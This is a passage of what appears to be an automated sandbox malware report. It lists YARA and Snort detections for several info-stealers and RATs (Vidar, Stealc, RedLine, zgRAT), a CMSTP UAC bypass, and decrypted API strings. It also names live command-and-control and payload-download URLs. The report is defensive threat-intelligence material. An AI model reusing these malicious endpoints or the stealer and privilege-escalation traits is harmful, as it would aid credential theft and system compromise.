14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272100c6ca8.4.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272100c6ca8.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272100c6ca8.4.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x1f5962:$s1: file:/// 0x1f5872:$s2: {11111-22222-10009-11112} 0x1f58f2:$s3: {11111-22222-50001-00000} 0x8177c:$s4: get_Module 0xe7db1:$s4: get_Module 0x1f3b25:$s4: get_Module 0xe9204:$s5: Reverse 0x1f3e0b:$s5: Reverse 0x8da95:$s6: BlockCopy 0x212279:$s6: BlockCopy 0x83c60:$s7: ReadByte 0x1f5974:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272101eeb15.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272101eeb15.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
1.2.u5ek.0.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.u5ek.0.exe.400000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2727cc40000.18.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
20.2.run.exe.3dda86d.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.run.exe.3dda86d.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
24.2.MSBuild.exe.1400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
24.2.MSBuild.exe.1400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
24.2.MSBuild.exe.1400000.0.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
1.2.u5ek.0.exe.40a0e67.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.u5ek.0.exe.40a0e67.1.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
4.2.cmd.exe.580f264.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
4.2.cmd.exe.580f264.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
21.2.cmd.exe.4b5ce64.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
21.2.cmd.exe.4b5ce64.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
20.2.run.exe.3e1ed5b.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.run.exe.3e1ed5b.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
21.2.cmd.exe.4b18976.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
21.2.cmd.exe.4b18976.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b94dad.3.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b94dad.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b94dad.3.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x1fddd5:$s1: file:/// 0x1fdce1:$s2: {11111-22222-10009-11112} 0x1fdd65:$s3: {11111-22222-50001-00000} 0x1fbfe0:$s4: get_Module 0x36d6d:$s5: Reverse 0x1fc30d:$s5: Reverse 0x3b9b4:$s6: BlockCopy 0x1f91ea:$s6: BlockCopy 0x372b2:$s7: ReadByte 0x1fdde7:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ed432f.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ed432f.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ed432f.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ed432f.1.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x33fd85:$s1: file:/// 0x33fc95:$s2: {11111-22222-10009-11112} 0x33fd15:$s3: {11111-22222-50001-00000} 0x1b26e8:$s4: get_Module 0x2b78fa:$s4: get_Module 0x33df48:$s4: get_Module 0x1b3b3b:$s5: Reverse 0x1f3faf:$s5: Reverse 0x33e22e:$s5: Reverse 0x2c3c13:$s6: BlockCopy 0x35c69c:$s6: BlockCopy 0x2b9dde:$s7: ReadByte 0x33fd97:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b847a3.4.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b847a3.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b847a3.4.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x20e3df:$s1: file:/// 0x20e2eb:$s2: {11111-22222-10009-11112} 0x20e36f:$s3: {11111-22222-50001-00000} 0x20c5ea:$s4: get_Module 0x47377:$s5: Reverse 0x20c917:$s5: Reverse 0x4bfbe:$s6: BlockCopy 0x2097f4:$s6: BlockCopy 0x478bc:$s7: ReadByte 0x20e3f1:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ead525.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ead525.5.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ead525.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ead525.5.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x366b8f:$s1: file:/// 0x366a9f:$s2: {11111-22222-10009-11112} 0x366b1f:$s3: {11111-22222-50001-00000} 0x1d94f2:$s4: get_Module 0x2de704:$s4: get_Module 0x364d52:$s4: get_Module 0x1da945:$s5: Reverse 0x21adb9:$s5: Reverse 0x365038:$s5: Reverse 0x2eaa1d:$s6: BlockCopy 0x3834a6:$s6: BlockCopy 0x2e0be8:$s7: ReadByte 0x366ba1:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ef8739.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ef8739.2.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ef8739.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ef8739.2.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x31b97b:$s1: file:/// 0x31b88b:$s2: {11111-22222-10009-11112} 0x31b90b:$s3: {11111-22222-50001-00000} 0x18e2de:$s4: get_Module 0x2934f0:$s4: get_Module 0x319b3e:$s4: get_Module 0x18f731:$s5: Reverse 0x1cfba5:$s5: Reverse 0x319e24:$s5: Reverse 0x29f809:$s6: BlockCopy 0x338292:$s6: BlockCopy 0x2959d4:$s7: ReadByte 0x31b98d:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
6.0.u5ek.3.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b7537d.6.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b7537d.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b7537d.6.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x21d805:$s1: file:/// 0x21d711:$s2: {11111-22222-10009-11112} 0x21d795:$s3: {11111-22222-50001-00000} 0x21ba10:$s4: get_Module 0x5679d:$s5: Reverse 0x21bd3d:$s5: Reverse 0x5b3e4:$s6: BlockCopy 0x218c1a:$s6: BlockCopy 0x56ce2:$s7: ReadByte 0x21d817:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
Click to see the 81 entries

Snort Signatures

ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) - Source IP: 192.168.2.4 - Destination IP: 185.172.128.90

Timestamp:	04/26/24-23:08:52.240583
SID:	2856233
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 - Source IP: 185.172.128.76 - Destination IP: 192.168.2.4

Timestamp:	04/26/24-23:09:00.358800
SID:	2051831
Source Port:	80
Destination Port:	49733
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.4 - Destination IP: 185.172.128.76

Timestamp:	04/26/24-23:08:57.572292
SID:	2044243
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.4 - Destination IP: 185.172.128.76

Timestamp:	04/26/24-23:08:59.654524
SID:	2044244
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 - Source IP: 185.172.128.76 - Destination IP: 192.168.2.4

Timestamp:	04/26/24-23:09:00.002826
SID:	2051828
Source Port:	80
Destination Port:	49733
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting plugins Config from C2 - Source IP: 192.168.2.4 - Destination IP: 185.172.128.76

Timestamp:	04/26/24-23:09:00.005433
SID:	2044246
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://185.172.128.59/syncUpd.exe	Avira URL Cloud: Label: malware
Source: http://185.172.128.228/ping.php?substr=two	Avira URL Cloud: Label: malware
Source: http://185.172.128.203/tiktok.exe	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\jwjqeqx

Avira: detection malicious, Label: HEUR/AGEN.1307453

Found malware configuration

Source: 00000001.00000003.1664086896.0000000005B60000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\jwjqeqx	ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\UIxMarketPlugin.dll	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\Temp\xtfky	ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	ReversingLabs: Detection: 18%

Multi AV Scanner detection for submitted file

Source: wxfSIz4PAi.exe

ReversingLabs: Detection: 44%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\jwjqeqx	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: wxfSIz4PAi.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: INSERT_KEY_HERE
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetProcAddress
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: LoadLibraryA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: lstrcatA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: OpenEventA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: CreateEventA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: CloseHandle
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: Sleep
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetUserDefaultLangID
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: VirtualAllocExNuma
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: VirtualFree
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetSystemInfo
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: VirtualAlloc
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: HeapAlloc
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetComputerNameA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: lstrcpyA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetProcessHeap
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetCurrentProcess
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: lstrlenA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: ExitProcess
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GlobalMemoryStatusEx
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetSystemTime
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: SystemTimeToFileTime
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: advapi32.dll
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: gdi32.dll
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: user32.dll
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: crypt32.dll
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: ntdll.dll
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetUserNameA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: CreateDCA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetDeviceCaps
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: ReleaseDC
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: CryptStringToBinaryA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: sscanf
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: VMwareVMware
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: HAL9TH
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: JohnDoe
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: DISPLAY
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: %hu/%hu/%hu
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: http://185.172.128.76
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: /3cd2b41cbde8fc9c.php
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: /15f649199f40275b/
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: default10
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetEnvironmentVariableA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetFileAttributesA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GlobalLock
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: HeapFree
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetFileSize
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GlobalSize
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: IsWow64Process
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: Process32Next
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetLocalTime
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: FreeLibrary
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetTimeZoneInformation
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetSystemPowerStatus
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetVolumeInformationA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetWindowsDirectoryA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: Process32First
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetLocaleInfoA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetUserDefaultLocaleName
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetModuleFileNameA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: DeleteFileA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: FindNextFileA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: LocalFree
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: FindClose
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: SetEnvironmentVariableA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: LocalAlloc
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetFileSizeEx
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: ReadFile
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: SetFilePointer
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: WriteFile
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: CreateFileA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: FindFirstFileA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: CopyFileA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: VirtualProtect
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetLastError
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: lstrcpynA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: MultiByteToWideChar
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GlobalFree
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: WideCharToMultiByte
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GlobalAlloc
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: OpenProcess
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: TerminateProcess
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetCurrentProcessId
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: gdiplus.dll
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: ole32.dll
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: bcrypt.dll
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: wininet.dll
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: shlwapi.dll
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: shell32.dll
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: psapi.dll
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: rstrtmgr.dll
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: CreateCompatibleBitmap
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: SelectObject
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: BitBlt
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: DeleteObject
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: CreateCompatibleDC
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GdipGetImageEncodersSize
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GdipGetImageEncoders
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GdiplusStartup
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GdiplusShutdown
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GdipSaveImageToStream
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GdipDisposeImage
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GdipFree
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetHGlobalFromStream
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: CreateStreamOnHGlobal
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: CoUninitialize
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: CoInitialize
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: CoCreateInstance
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: BCryptDecrypt
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: BCryptSetProperty
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: BCryptDestroyKey
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetWindowRect
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetDesktopWindow
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetDC
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: CloseWindow
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: wsprintfA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: EnumDisplayDevicesA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetKeyboardLayoutList
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: CharToOemW
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: wsprintfW
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: RegQueryValueExA
